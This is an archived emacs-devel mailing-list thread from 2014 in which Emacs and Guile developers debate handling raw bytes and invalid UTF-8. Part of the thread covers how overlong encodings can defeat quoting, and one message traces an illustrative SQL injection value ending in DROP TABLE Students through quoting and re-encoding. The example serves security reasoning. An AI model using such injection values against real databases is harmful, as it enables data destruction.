* Re: Emacs Lisp's future 2014-10-05 21:49 ` Richard Stallman [not found] ` <"<83lhotme1e.fsf"@gnu.org> @ 2014-10-06 3:18 ` Stephen J. Turnbull 2014-10-06 19:15 ` Richard Stallman 2014-10-06 6:21 ` Mark H Weaver 2 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-06 3:18 UTC (permalink / raw) To: rms; +Cc: dak, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, eliz Richard Stallman writes: > I'd like to know how it is that "raw bytes" have security implications. > Are there programs that make assumptions about the contents of strings? > That seems like bad design. Yes, they do, and no, it's poor implementation, not bad design -- they're conforming to standards that say that string contents will have a specific form and are unfortunately imperfectly protected from invalid input by their I/O modules (for example, the \201 bug in Emacs itself). As a consequence it's often possible to crash a program that is incompletely robust to invalid encodings. If that program is a spam/virus checker, and the problem is compounded by a site policy that accepts mail when the checker fails, anything can happen. That's just an example. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 3:18 ` Stephen J. Turnbull @ 2014-10-06 19:15 ` Richard Stallman 2014-10-07 0:46 ` Stephen J. Turnbull 2014-10-10 10:09 ` Thien-Thi Nguyen 0 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-06 19:15 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > I'd like to know how it is that "raw bytes" have security implications. > Are there programs that make assumptions about the contents of strings? > That seems like bad design. Yes, they do, and no, it's poor implementation, not bad design -- they're conforming to standards that say that string contents will have a specific form and are unfortunately imperfectly protected from invalid input by their I/O modules (for example, the \201 bug in Emacs itself). ...If that program is a spam/virus checker,... Do people write spam/virus checkers using Guile? This issue is specifically about Guile. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 19:15 ` Richard Stallman @ 2014-10-07 0:46 ` Stephen J. Turnbull 2014-10-07 14:04 ` Richard Stallman 2014-10-10 10:09 ` Thien-Thi Nguyen 1 sibling, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-07 0:46 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz Richard Stallman writes: > Do people write spam/virus checkers using Guile? I don't know. Why do you care? The example is valid, and they *might*, in which case they need conservative (conformant when conformance is implied by names, such as "UTF-8") behavior. If such a user discovers that Guile emits nonconformant UTF-8, they'll surely have to wonder what other security holes they've imported by simply selecting Guile as an application platform. To put it another way, Mark said that Guile is intended to be useful writing servers as well as interactive programs. Spam checking is simply a convenient example of a daemon application where undefined behavior can easily result in undesired output. However, the general principle is that undefined behavior can sometimes be exploited, and therefore processes that run unattended should have *all* their behavior defined. This doesn't necessarily apply to Emacs, although I think it should. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 0:46 ` Stephen J. Turnbull @ 2014-10-07 14:04 ` Richard Stallman 2014-10-07 15:43 ` Stephen J. Turnbull 0 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-07 14:04 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > Do people write spam/virus checkers using Guile? I don't know. Why do you care? Because hypothetical examples that I think are unlikely to really occur carry very little weight in this argument. If such a user discovers that Guile emits nonconformant UTF-8, they'll surely have to wonder what other security holes they've imported by simply selecting Guile as an application platform. I don't think we should make practical decisions based on such "What would they think?" arguments. We should do what's right, and people can think what they like. To put it another way, Mark said that Guile is intended to be useful writing servers as well as interactive programs. This discussion is about Guile in the context of Emacs specifically. "What Guile does" generally is a different, though related, topic. Guile could follow the Unicode spec in normal operation, but offer another mode that Emacs can use. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 14:04 ` Richard Stallman @ 2014-10-07 15:43 ` Stephen J. Turnbull 2014-10-07 16:01 ` David Kastrup 2014-10-07 16:16 ` David Kastrup 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-07 15:43 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz Richard Stallman writes: > To put it another way, Mark said that Guile is intended to be useful > writing servers as well as interactive programs. > > This discussion is about Guile in the context of Emacs specifically. > "What Guile does" generally is a different, though related, topic. > Guile could follow the Unicode spec in normal operation, but offer > another mode that Emacs can use. It *could*, but it for the default is entirely unclear to me that it *should*. Some use cases, such as AUCTeX parsing error messages from TeX (which treats content quoted from the document as bytes, and so may slice characters into two invalid byte sequences), will use some sort of reversible encoding of raw bytes (the current Emacs encoding is one option, of course). But they can do that explicitly. However, in general I think that Emacs should help users who are naive about Unicode to avoid emitting invalid Unicode, and so should default to querying the user for permission if that were about to happen. It should not silently pass on corrupt input to the output. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 15:43 ` Stephen J. Turnbull @ 2014-10-07 16:01 ` David Kastrup 2014-10-07 18:15 ` Stephen J. Turnbull 2014-10-07 16:16 ` David Kastrup 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-07 16:01 UTC (permalink / raw) To: Stephen J. Turnbull Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Richard Stallman writes: > > > To put it another way, Mark said that Guile is intended to be useful > > writing servers as well as interactive programs. > > > > This discussion is about Guile in the context of Emacs specifically. > > "What Guile does" generally is a different, though related, topic. > > Guile could follow the Unicode spec in normal operation, but offer > > another mode that Emacs can use. > > It *could*, but it for the default is entirely unclear to me that it > *should*. Some use cases, such as AUCTeX parsing error messages from > TeX (which treats content quoted from the document as bytes, and so > may slice characters into two invalid byte sequences), will use some > sort of reversible encoding of raw bytes (the current Emacs encoding > is one option, of course). But they can do that explicitly. > > However, in general I think that Emacs should help users who are naive > about Unicode to avoid emitting invalid Unicode, and so should default > to querying the user for permission if that were about to happen. It > should not silently pass on corrupt input to the output. I repeat: that is to be the choice of the application rather than the engine. "We know better than the application writer what he wants" is rarely going to work to the satisfaction of all. This leads to "how do I best work around the engine" approaches that tend to be much less maintainable than explicit actions taking in a place intended by the application. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 16:01 ` David Kastrup @ 2014-10-07 18:15 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-07 18:15 UTC (permalink / raw) To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz David Kastrup writes: > I repeat: that is to be the choice of the application rather than > the engine. Which is what *I* said. But the engine *should* have a default for convenience of at least some use cases. What Mark (AFAICS) and I want is to default to not emitting broken Unicode. If the application chooses to do so, it should do so explicitly. > "We know better than the application writer what he wants" is > rarely going to work to the satisfaction of all. Again, I've said that in this thread already. Finally, note that there's nothing nonconformant about rawbytes in the internal representation per se. The Unicode standard is for *interchange* and says nothing about Emacs buffers. If TeX is produces invalid UTF-8 and AUCTeX accepts that and converts invalid UTF-8 to rawbytes, that's not a problem -- everybody knows what is going on -- and conformance is a non-issue, since it's all internal. (I don't claim Mark agrees with this paragraph. And he probably doesn't for the applications he envisions, because they are modular (where Emacs is monolithic), and therefore strings in internal representation are passed across module boundaries.) But Emacs should not save that buffer to a file or send its contents to a network stream, without either explicit permission from the user, or explicit configuration of the output stream by the application. Autosaves are another thorny problem. I suppose they will be handled by declaring them conformant only to Emacs' needs. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 15:43 ` Stephen J. Turnbull 2014-10-07 16:01 ` David Kastrup @ 2014-10-07 16:16 ` David Kastrup 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-07 16:16 UTC (permalink / raw) To: Stephen J. Turnbull Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Richard Stallman writes: > > > To put it another way, Mark said that Guile is intended to be useful > > writing servers as well as interactive programs. > > > > This discussion is about Guile in the context of Emacs specifically. > > "What Guile does" generally is a different, though related, topic. > > Guile could follow the Unicode spec in normal operation, but offer > > another mode that Emacs can use. > > It *could*, but it for the default is entirely unclear to me that it > *should*. Some use cases, such as AUCTeX parsing error messages from > TeX (which treats content quoted from the document as bytes, and so > may slice characters into two invalid byte sequences), will use some > sort of reversible encoding of raw bytes (the current Emacs encoding > is one option, of course). But they can do that explicitly. Not really. The terminal/log output will in general reflect the encoding of the source document and it is human-readable, so you want the output filter to generally decode as utf-8. Now TeX may indeed choose to slice multibyte characters in two (for example, because it inserts newlines in its output every 79 bytes). Parsing the error messages properly requires the ability to reconstruct the input before the output filter decoded it. Neither having the output filter pass everything as bytes (that will make the output generally unfit for human consumption rather than just in single places) nor "sanitizing" it (that will make reconstruction of the original context impossible) are satisfactory here. The "I know you don't want me to produce anything other than utf-8 anyway" attitude is just getting in the way of such application needs. Sometimes things are messy, and it must remain the application's choice how it wants the mess to be dealt with. > However, in general I think that Emacs should help users who are naive > about Unicode to avoid emitting invalid Unicode, and so should default > to querying the user for permission if that were about to happen. It > should not silently pass on corrupt input to the output. You are confusing Emacs with the applications running on it. It is not the job of an engine to make the decisions for an application. In general, an engine should deal with the problems you tell it to deal with. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 19:15 ` Richard Stallman 2014-10-07 0:46 ` Stephen J. Turnbull @ 2014-10-10 10:09 ` Thien-Thi Nguyen 1 sibling, 0 replies; 404+ messages in thread From: Thien-Thi Nguyen @ 2014-10-10 10:09 UTC (permalink / raw) To: emacs-devel [-- Attachment #1: Type: text/plain, Size: 784 bytes --] () Richard Stallman <rms@gnu.org> () Mon, 06 Oct 2014 15:15:20 -0400 Do people write spam/virus checkers using Guile? This issue is specifically about Guile. Two examples that jump to mind: GNU Mailutils (http://www.gnu.org/software/mailutils/), specifically its "Sieve" handling (based on RFC 3028), is extensible w/ Guile. In ttn-do (http://www.gnuvola.org/software/ttn-do/), the program "magic" is a file(1)-workalike, which basically means it trundles through unknown byte sequences, sometimes interpreting them as strings. -- Thien-Thi Nguyen GPG key: 4C807502 (if you're human and you know it) read my lisp: (responsep (questions 'technical) (not (via 'mailing-list))) => nil [-- Attachment #2: signature.asc --] [-- Type: application/pgp-signature, Size: 197 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 21:49 ` Richard Stallman [not found] ` <"<83lhotme1e.fsf"@gnu.org> 2014-10-06 3:18 ` Stephen J. Turnbull @ 2014-10-06 6:21 ` Mark H Weaver 2014-10-06 15:08 ` Eli Zaretskii 2014-10-11 18:34 ` Florian Weimer 2 siblings, 2 replies; 404+ messages in thread From: Mark H Weaver @ 2014-10-06 6:21 UTC (permalink / raw) To: rms; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen Richard Stallman <rms@gnu.org> writes: > * I'm concerned that there are security implications to supporting the > "raw byte" code points. I can expand on this more if you'd like. > > I'd like to know how it is that "raw bytes" have security implications. To give an example, consider a procedure that needs to pass a string from an untrusted source to an SQL query. To do this safely, it needs to quote the string. I haven't researched how to properly quote SQL string literals, but in general, quoting is typically done by recognizing some set of special characters that must be escaped, and allowing all other characters through unmodified. However, "raw byte" code points can be used to bypass such a quoting mechanism, and thus send an unescaped closing quote to the SQL database followed by arbitrary SQL commands. A related problem has to do with the fact that naively implemented UTF-8 allows code points to be represented with more bytes than are actually needed, essentially by padding the code point with leading zeroes and then encoding with UTF-8 as if the high bits were non-zero. For example, the ASCII quote (") can be represented as the single byte 0x22, the two byte sequence 0xC0 0xA2, etc. UTF-8 decoders are supposed to detect and reject these "overlong" encodings, but it is likely that many programs fail to do this. Such programs are usually vulnerable to these overlong encodings when trying to detect special characters (e.g. for quoting/escaping) or when validating inputs. To cope with this, the Unicode standards require that UTF-8 codecs reject overlong encodings and other invalid byte sequences. This is in direct conflict with the idea of "raw byte" code points, whose purpose is to be tolerant of arbitrary byte sequences and to propagate them unchanged. FWIW, I agree that the Emacs behavior is desirable when editing a file that may contain coding errors, but in most other cases (e.g. when communicating with processes or network sockets) I think that it's more appropriate to refuse to accept, produce, or propagate invalid UTF-8 such as overlong encodings. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 6:21 ` Mark H Weaver @ 2014-10-06 15:08 ` Eli Zaretskii 2014-10-06 15:33 ` David Kastrup 2014-10-06 16:27 ` Mark H Weaver 2014-10-11 18:34 ` Florian Weimer 1 sibling, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-06 15:08 UTC (permalink / raw) To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen > From: Mark H Weaver <mhw@netris.org> > Cc: monnier@iro.umontreal.ca, dak@gnu.org, dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, eliz@gnu.org, stephen@xemacs.org > Date: Mon, 06 Oct 2014 02:21:41 -0400 > > A related problem has to do with the fact that naively implemented UTF-8 > allows code points to be represented with more bytes than are actually > needed, essentially by padding the code point with leading zeroes and > then encoding with UTF-8 as if the high bits were non-zero. For > example, the ASCII quote (") can be represented as the single byte 0x22, > the two byte sequence 0xC0 0xA2, etc. > > UTF-8 decoders are supposed to detect and reject these "overlong" > encodings, but it is likely that many programs fail to do this. Such > programs are usually vulnerable to these overlong encodings when trying > to detect special characters (e.g. for quoting/escaping) or when > validating inputs. > > To cope with this, the Unicode standards require that UTF-8 codecs > reject overlong encodings and other invalid byte sequences. This is in > direct conflict with the idea of "raw byte" code points, whose purpose > is to be tolerant of arbitrary byte sequences and to propagate them > unchanged. The obvious solution is to encode the raw bytes internally in a UTF-8 compatible way. Which is what Emacs does in its buffers and strings, as I'm sure you know. Can't Guile do something similar? > FWIW, I agree that the Emacs behavior is desirable when editing a file > that may contain coding errors, but in most other cases (e.g. when > communicating with processes or network sockets) I think that it's more > appropriate to refuse to accept, produce, or propagate invalid UTF-8 > such as overlong encodings. Emacs indeed rejects them, but that doesn't mean it disallows raw bytes as part of otherwise valid UTF-8 content. It's a fact of life that such stray bytes sometimes happen, and users would be generally unhappy if Emacs would reject a file because it had such bytes. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 15:08 ` Eli Zaretskii @ 2014-10-06 15:33 ` David Kastrup 2014-10-06 16:24 ` Eli Zaretskii 2014-10-06 16:27 ` Mark H Weaver 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-06 15:33 UTC (permalink / raw) To: Eli Zaretskii Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, stephen Eli Zaretskii <eliz@gnu.org> writes: >> From: Mark H Weaver <mhw@netris.org> >> Cc: monnier@iro.umontreal.ca, dak@gnu.org, dmantipov@yandex.ru, >> emacs-devel@gnu.org, handa@gnu.org, eliz@gnu.org, stephen@xemacs.org >> Date: Mon, 06 Oct 2014 02:21:41 -0400 >> >> A related problem has to do with the fact that naively implemented UTF-8 >> allows code points to be represented with more bytes than are actually >> needed, essentially by padding the code point with leading zeroes and >> then encoding with UTF-8 as if the high bits were non-zero. For >> example, the ASCII quote (") can be represented as the single byte 0x22, >> the two byte sequence 0xC0 0xA2, etc. >> >> UTF-8 decoders are supposed to detect and reject these "overlong" >> encodings, but it is likely that many programs fail to do this. Such >> programs are usually vulnerable to these overlong encodings when trying >> to detect special characters (e.g. for quoting/escaping) or when >> validating inputs. >> >> To cope with this, the Unicode standards require that UTF-8 codecs >> reject overlong encodings and other invalid byte sequences. This is in >> direct conflict with the idea of "raw byte" code points, whose purpose >> is to be tolerant of arbitrary byte sequences and to propagate them >> unchanged. > > The obvious solution is to encode the raw bytes internally in a UTF-8 > compatible way. Which is what Emacs does in its buffers and strings, > as I'm sure you know. Can't Guile do something similar? If an overlong UTF-8 byte sequence representing '"' is processed transparently by Emacs, it will be reencoded into the original afterwards and depending on the next processing stage might trip up software afterwards. Of course, it would have done equally so without Emacs (or GUILE) in the middle. The solution obviously is to use a coding scheme for recoding that does _not_ reproduce unencodable bytes. Now if the intermediate processing added escape characters for the unencodable bytes, you can arrive at something like (using % for unencodable) [Input] Robert%");DROP TABLE Students;-- [quotified] "Robert\%\");DROP TABLE Students;--" [cleanencoded] "Robert\\");DROP TABLE Students;--" [Pasted into SQL command] Uh oh. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 15:33 ` David Kastrup @ 2014-10-06 16:24 ` Eli Zaretskii 2014-10-06 16:40 ` David Kastrup 2014-10-06 17:04 ` Stephen J. Turnbull 0 siblings, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-06 16:24 UTC (permalink / raw) To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen > From: David Kastrup <dak@gnu.org> > Cc: Mark H Weaver <mhw@netris.org>, rms@gnu.org, monnier@iro.umontreal.ca, dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, stephen@xemacs.org > Date: Mon, 06 Oct 2014 17:33:21 +0200 > > If an overlong UTF-8 byte sequence representing '"' is processed > transparently by Emacs, it will be reencoded into the original > afterwards and depending on the next processing stage might trip up > software afterwards. Indeed. But that's what is expected from an editor: not to change the stuff the user didn't touch. > Of course, it would have done equally so without Emacs (or GUILE) in > the middle. Right. > The solution obviously is to use a coding scheme for recoding that > does _not_ reproduce unencodable bytes. An editor such as Emacs cannot do that, I think. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 16:24 ` Eli Zaretskii @ 2014-10-06 16:40 ` David Kastrup 2014-10-06 17:04 ` Stephen J. Turnbull 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-06 16:40 UTC (permalink / raw) To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen Eli Zaretskii <eliz@gnu.org> writes: >> From: David Kastrup <dak@gnu.org> >> Cc: Mark H Weaver <mhw@netris.org>, rms@gnu.org, >> monnier@iro.umontreal.ca, dmantipov@yandex.ru, emacs-devel@gnu.org, >> handa@gnu.org, stephen@xemacs.org >> Date: Mon, 06 Oct 2014 17:33:21 +0200 >> >> If an overlong UTF-8 byte sequence representing '"' is processed >> transparently by Emacs, it will be reencoded into the original >> afterwards and depending on the next processing stage might trip up >> software afterwards. > > Indeed. But that's what is expected from an editor: not to change the > stuff the user didn't touch. > >> Of course, it would have done equally so without Emacs (or GUILE) in >> the middle. > > Right. > >> The solution obviously is to use a coding scheme for recoding that >> does _not_ reproduce unencodable bytes. > > An editor such as Emacs cannot do that, I think. It sure can. Saving with a different encoding system than the one one started with is always an option. Not all encoding system variants need to be lossless, and the choice how to treat non-encodable bytes can be part of the coding system variant. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 16:24 ` Eli Zaretskii 2014-10-06 16:40 ` David Kastrup @ 2014-10-06 17:04 ` Stephen J. Turnbull 2014-10-06 17:34 ` David Kastrup 2014-10-07 14:03 ` Richard Stallman 1 sibling, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-06 17:04 UTC (permalink / raw) To: Eli Zaretskii Cc: David Kastrup, rms, mhw, dmantipov, emacs-devel, handa, monnier Eli Zaretskii writes: > > From: David Kastrup <dak@gnu.org> > Indeed. But that's what is expected from an editor: not to change the > stuff the user didn't touch. If the user thinks of the "stuff" as characters, they will be unhappy if the editor displays raw bytes for something that could be decoded, and they will prefer standards conforming output, if only in those instances where non-conformant output results in an explosion in a later processor. Of course you are quite right that there are many cases where the user would be happiest if the editor didn't touch byte sequence that the user didn't explicitly tell it to touch. My point is that neither approach is always right. > > The solution obviously is to use a coding scheme for recoding that > > does _not_ reproduce unencodable bytes. > > An editor such as Emacs cannot do that, I think. It should do so as an option, with the alternative being to ask for confirmation (this would be automatically satisfied if input and output rawbytes handlers were separate) if nonconforming output would be produced. Emacs of *all* editors should not produce non-conforming output silently (unless explicitly silenced), even if it got non-conforming input. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 17:04 ` Stephen J. Turnbull @ 2014-10-06 17:34 ` David Kastrup 2014-10-07 0:33 ` Stephen J. Turnbull 2014-10-07 14:03 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-06 17:34 UTC (permalink / raw) To: Stephen J. Turnbull Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii "Stephen J. Turnbull" <stephen@xemacs.org> writes: > It should do so as an option, with the alternative being to ask for > confirmation (this would be automatically satisfied if input and > output rawbytes handlers were separate) if nonconforming output would > be produced. Emacs of *all* editors should not produce non-conforming > output silently (unless explicitly silenced), even if it got > non-conforming input. That sounds like you are talking about a processing pipe. An editor is not really the same. Even for something like sed I'd expect no changes in parts that are, well, not changed. Much more so for a proper editor. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 17:34 ` David Kastrup @ 2014-10-07 0:33 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-07 0:33 UTC (permalink / raw) To: David Kastrup; +Cc: mhw, emacs-devel David Kastrup writes: > That sounds like you are talking about a processing pipe. No, I'm talking about a Unicode conformant process. If you don't need Unicode conformance and do need to emit garbage, you can specify a Unicode-like but non-conformant codec. All I'm saying (and Mark I believe is on the smae page, if not the same octet) is that (1) Emacs codecs corresponding to published standards (specifically, UTF-8 and other UTFs) should conform to those standards by default, even where that means annoying users (they'll learn to request non-conformant codecs if that's really what they want). (2) Emacs should make special effort at conformance with Unicode because it is especially well-defined. Making this pleasant for users will require some effort, but will be well worth it in the end. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 17:04 ` Stephen J. Turnbull 2014-10-06 17:34 ` David Kastrup @ 2014-10-07 14:03 ` Richard Stallman 2014-10-07 14:37 ` Eli Zaretskii 1 sibling, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-07 14:03 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] If the user thinks of the "stuff" as characters, they will be unhappy if the editor displays raw bytes for something that could be decoded, What case does that refer to, concretely? Emacs normally recognizes UTF-8 text and decodes it. If some text isn't proper UTF-8, it may use raw bytes for that text. But when does it do this for text that can be decoded as UTF-8? I don't think that ever happens. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 14:03 ` Richard Stallman @ 2014-10-07 14:37 ` Eli Zaretskii 0 siblings, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-07 14:37 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Tue, 07 Oct 2014 10:03:37 -0400 > From: Richard Stallman <rms@gnu.org> > CC: eliz@gnu.org, dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, > emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca > > Emacs normally recognizes UTF-8 text and decodes it. If some text > isn't proper UTF-8, it may use raw bytes for that text. But when does > it do this for text that can be decoded as UTF-8? I don't think > that ever happens. It could happen if the user instructed Emacs to decode the text as something else, like Latin-1. But then I think it's the user's responsibility. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 15:08 ` Eli Zaretskii 2014-10-06 15:33 ` David Kastrup @ 2014-10-06 16:27 ` Mark H Weaver 2014-10-06 16:47 ` Eli Zaretskii 2014-10-06 19:17 ` Richard Stallman 1 sibling, 2 replies; 404+ messages in thread From: Mark H Weaver @ 2014-10-06 16:27 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen Eli Zaretskii <eliz@gnu.org> writes: >> From: Mark H Weaver <mhw@netris.org> >> Cc: monnier@iro.umontreal.ca, dak@gnu.org, dmantipov@yandex.ru, >> emacs-devel@gnu.org, handa@gnu.org, eliz@gnu.org, stephen@xemacs.org >> Date: Mon, 06 Oct 2014 02:21:41 -0400 >> >> A related problem has to do with the fact that naively implemented UTF-8 >> allows code points to be represented with more bytes than are actually >> needed, essentially by padding the code point with leading zeroes and >> then encoding with UTF-8 as if the high bits were non-zero. For >> example, the ASCII quote (") can be represented as the single byte 0x22, >> the two byte sequence 0xC0 0xA2, etc. >> >> UTF-8 decoders are supposed to detect and reject these "overlong" >> encodings, but it is likely that many programs fail to do this. Such >> programs are usually vulnerable to these overlong encodings when trying >> to detect special characters (e.g. for quoting/escaping) or when >> validating inputs. >> >> To cope with this, the Unicode standards require that UTF-8 codecs >> reject overlong encodings and other invalid byte sequences. This is in >> direct conflict with the idea of "raw byte" code points, whose purpose >> is to be tolerant of arbitrary byte sequences and to propagate them >> unchanged. > > The obvious solution is to encode the raw bytes internally in a UTF-8 > compatible way. Which is what Emacs does in its buffers and strings, > as I'm sure you know. Can't Guile do something similar? I'm afraid you've misunderstood, or perhaps I've failed to explain it clearly. It doesn't matter how these raw bytes are encoded internally. No matter what mechanism we use to accomplish it, propagating invalid byte sequences by default is bad security policy. It has the effect of exposing all internal subsystems to malformed UTF-8 such as overlong encodings unless users take explicit steps to check for them and remove them. This is a recipe for security holes. The Unicode standard requires that all UTF-8 codecs refuse to accept, produce, or propagate invalid byte sequences, including the troublesome overlong encodings. I'm not one for blindly following standards, but in my opinion this is the default policy we should adopt. Editing files is an unusual case. Of course, we want users to be able to edit a file with coding errors, and to leave any part of the file untouched by the user exactly as it was. Anything else would be a mistake. However, I would argue that even in Emacs, string<->bytevector conversions should be strict by default, so that other uses of them (e.g. communication over sockets, pipes, and encoding of command-line arguments to subprocess) should be strict by default. Even if you disagree, I'd like the strict mode to remain the default in Guile. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 16:27 ` Mark H Weaver @ 2014-10-06 16:47 ` Eli Zaretskii 2014-10-06 17:31 ` David Kastrup ` (3 more replies) 2014-10-06 19:17 ` Richard Stallman 1 sibling, 4 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-06 16:47 UTC (permalink / raw) To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen > From: Mark H Weaver <mhw@netris.org> > Cc: dak@gnu.org, rms@gnu.org, dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, stephen@xemacs.org > Date: Mon, 06 Oct 2014 12:27:35 -0400 > > > The obvious solution is to encode the raw bytes internally in a UTF-8 > > compatible way. Which is what Emacs does in its buffers and strings, > > as I'm sure you know. Can't Guile do something similar? > > I'm afraid you've misunderstood, or perhaps I've failed to explain it > clearly. I think I did understand your perfectly clear explanation. > It doesn't matter how these raw bytes are encoded internally. No matter > what mechanism we use to accomplish it, propagating invalid byte > sequences by default is bad security policy. How can we be responsible for byte streams that originated outside? That's the responsibility of the source. And if there is a consumer, then it is their responsibility not to trip upon such bytes. But how can you refuse to copy such bytes when you are just a pipe that is expected not to change anything it wasn't toild to? Btw, Emacs doesn't expose the internal representation of these bytes easily to Lisp programs. That is, whenever any program tries to access the character at that position, it gets the original raw byte that was there before the string was read from outside. A Lisp program needs some very tricky and deliberate techniques to access the internal representation of such bytes. (It isn't "overlong", btw, we just represent the 128 bytes as codepoints in the 0x3fffXX range, and encode it in UTF-8 with 5 bytes.) > The Unicode standard requires that all UTF-8 codecs refuse to accept, > produce, or propagate invalid byte sequences, including the troublesome > overlong encodings. What Emacs does is interpret each byte of such invalid byte sequences as a separate raw byte, and represent each one of them internally as described above. Emacs cannot "refuse to propagate" the original sequence, because users of an editor expect it not to alter any part of the input that wasn't explicitly modified by the user or commands she invoked. > I'm not one for blindly following standards, but in my opinion this > is the default policy we should adopt. So just passing a string unaltered through a Guile program would change that string? That sounds like unpleasant surprise for the users, at least for Emacs users. Emacs has been there around v20.x, and we still carry the scars. It would be a unwise, IMO, if Guile would repeat those same mistakes. ^ permalink raw reply [flat|nested] 404+ messages in thread
